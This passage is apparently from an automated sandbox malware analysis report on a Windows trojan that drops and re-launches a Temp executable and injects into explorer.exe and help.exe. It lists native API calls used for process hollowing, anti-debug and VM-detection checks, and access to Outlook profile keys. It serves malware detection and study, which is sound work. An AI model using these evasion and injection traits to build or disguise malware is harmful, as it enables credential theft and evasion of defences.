          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004044C73_2_004044C7
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004044BE3_2_004044BE
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004046E73_2_004046E7
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0040FE873_2_0040FE87
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE20A03_2_00AE20A0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B820A83_2_00B820A8
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACB0903_2_00ACB090
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B828EC3_2_00B828EC
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B8E8243_2_00B8E824
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B710023_2_00B71002
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD41203_2_00AD4120
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABF9003_2_00ABF900
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B822AE3_2_00B822AE
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B6FA2B3_2_00B6FA2B
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEEBB03_2_00AEEBB0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7DBD23_2_00B7DBD2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B703DA3_2_00B703DA
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B82B283_2_00B82B28
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAB403_2_00ADAB40
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC841F3_2_00AC841F
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7D4663_2_00B7D466
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE25813_2_00AE2581
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACD5E03_2_00ACD5E0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B825DD3_2_00B825DD
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB0D203_2_00AB0D20
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B82D073_2_00B82D07
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B81D553_2_00B81D55
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B82EF73_2_00B82EF7
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD6E303_2_00AD6E30
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7D6163_2_00B7D616
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B81FF13_2_00B81FF1
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B8DFCE3_2_00B8DFCE
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: String function: 00ABB150 appears 45 times
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041E087 NtAllocateVirtualMemory,3_2_0041E087
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004012B0 EntryPoint,NtProtectVirtualMemory,3_2_004012B0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041DEA7 NtCreateFile,3_2_0041DEA7
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041DF57 NtReadFile,3_2_0041DF57
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041DFD7 NtClose,3_2_0041DFD7
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041E081 NtAllocateVirtualMemory,3_2_0041E081
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004012A4 EntryPoint,NtProtectVirtualMemory,3_2_004012A4
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004014E9 NtProtectVirtualMemory,3_2_004014E9
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041DF52 NtReadFile,3_2_0041DF52
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041DFD2 NtClose,3_2_0041DFD2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00AF98F0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00AF9860
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9840 NtDelayExecution,LdrInitializeThunk,3_2_00AF9840
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF99A0 NtCreateSection,LdrInitializeThunk,3_2_00AF99A0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00AF9910
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9A20 NtResumeThread,LdrInitializeThunk,3_2_00AF9A20
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00AF9A00
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9A50 NtCreateFile,LdrInitializeThunk,3_2_00AF9A50
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF95D0 NtClose,LdrInitializeThunk,3_2_00AF95D0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9540 NtReadFile,LdrInitializeThunk,3_2_00AF9540
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00AF96E0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00AF9660
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00AF97A0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,3_2_00AF9780
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9FE0 NtCreateMutant,LdrInitializeThunk,3_2_00AF9FE0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,3_2_00AF9710
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF98A0 NtWriteVirtualMemory,3_2_00AF98A0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9820 NtEnumerateKey,3_2_00AF9820
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AFB040 NtSuspendThread,3_2_00AFB040
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF99D0 NtCreateProcessEx,3_2_00AF99D0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9950 NtQueueApcThread,3_2_00AF9950
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9A80 NtOpenDirectoryObject,3_2_00AF9A80
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9A10 NtQuerySection,3_2_00AF9A10
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AFA3B0 NtGetContextThread,3_2_00AFA3B0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9B00 NtSetValueKey,3_2_00AF9B00
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF95F0 NtQueryInformationFile,3_2_00AF95F0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9520 NtWaitForSingleObject,3_2_00AF9520
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AFAD30 NtSetContextThread,3_2_00AFAD30
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9560 NtWriteFile,3_2_00AF9560
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF96D0 NtCreateKey,3_2_00AF96D0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9610 NtEnumerateValueKey,3_2_00AF9610
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9670 NtQueryInformationProcess,3_2_00AF9670
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9650 NtQueryValueKey,3_2_00AF9650
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9730 NtQueryVirtualMemory,3_2_00AF9730
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AFA710 NtOpenProcessToken,3_2_00AFA710
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9760 NtOpenProcess,3_2_00AF9760
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF9770 NtSetInformationFile,3_2_00AF9770
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AFA770 NtOpenThread,3_2_00AFA770
          Source: Lc8xQv8iZY.exeReversingLabs: Detection: 48%
          Source: Lc8xQv8iZY.exeVirustotal: Detection: 47%
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeFile read: C:\Users\user\Desktop\Lc8xQv8iZY.exeJump to behavior
          Source: Lc8xQv8iZY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Lc8xQv8iZY.exe C:\Users\user\Desktop\Lc8xQv8iZY.exe
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeProcess created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeProcess created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeProcess created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.hJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeProcess created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.hJump to behavior
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeFile created: C:\Users\user\AppData\Local\Temp\nsaAF5E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@9/7
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004043F5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3748:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCommand line argument: ^oA1_2_00416EB0
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Binary string: wntdll.pdbUGP source: hvbvmxm.exe, 00000001.00000003.304073189.0000000002740000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000001.00000003.303031511.00000000028D0000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: hvbvmxm.exe, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040CC02 push cs; retf 0040h1_2_0040CC21
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040AC96 push ecx; ret 1_2_0040ACA9
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004210E9 push eax; ret 3_2_004210EF
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004210F2 push eax; ret 3_2_00421159
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0042109C push eax; ret 3_2_004210EF
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00421153 push eax; ret 3_2_00421159
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0040EAA3 push ecx; retf 3_2_0040EAA6
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041E5D0 push ecx; iretd 3_2_0041E5D2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00419F38 push edx; ret 3_2_00419F39
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0041FF93 push ebx; retf 3_2_0041FF94
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B0D0D1 push ecx; ret 3_2_00B0D0E4
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeFile created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeJump to dropped file
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-10895
          Source: C:\Windows\explorer.exe TID: 5288Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\help.exe TID: 4464Thread sleep time: -42000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE6A60 rdtscp 3_2_00AE6A60
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeAPI coverage: 6.8 %
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeAPI coverage: 9.3 %
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405620
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,0_2_00405FF6
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00402654 FindFirstFileA,0_2_00402654
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00410370 FindFirstFileExW,1_2_00410370
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeAPI call chain: ExitProcess graph end nodegraph_0-3335
          Source: explorer.exe, 00000004.00000000.349521692.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.349893553.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
          Source: explorer.exe, 00000004.00000000.317884001.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
          Source: explorer.exe, 00000004.00000000.324860902.00000000085BD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.323779585.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.326086945.000000000CDC8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000004.00000000.350579899.000000000858E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.349521692.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040AA3F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0040AA3F
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0041273A GetProcessHeap,1_2_0041273A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE6A60 rdtscp 3_2_00AE6A60
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0041141B mov eax, dword ptr fs:[00000030h]1_2_0041141B
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040ED78 mov eax, dword ptr fs:[00000030h]1_2_0040ED78
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00B80019 mov eax, dword ptr fs:[00000030h]1_2_00B80019
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00B80005 mov eax, dword ptr fs:[00000030h]1_2_00B80005
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00B8007A mov eax, dword ptr fs:[00000030h]1_2_00B8007A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00B80149 mov eax, dword ptr fs:[00000030h]1_2_00B80149
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF90AF mov eax, dword ptr fs:[00000030h]3_2_00AF90AF
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEF0BF mov ecx, dword ptr fs:[00000030h]3_2_00AEF0BF
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h]3_2_00AEF0BF
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h]3_2_00AEF0BF
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB9080 mov eax, dword ptr fs:[00000030h]3_2_00AB9080
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h]3_2_00B33884
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h]3_2_00B33884
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB58EC mov eax, dword ptr fs:[00000030h]3_2_00AB58EC
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h]3_2_00AB40E1
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h]3_2_00AB40E1
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h]3_2_00AB40E1
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]3_2_00AE002D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]3_2_00AE002D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]3_2_00AE002D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]3_2_00AE002D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]3_2_00AE002D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]3_2_00ACB02A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]3_2_00ACB02A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]3_2_00ACB02A
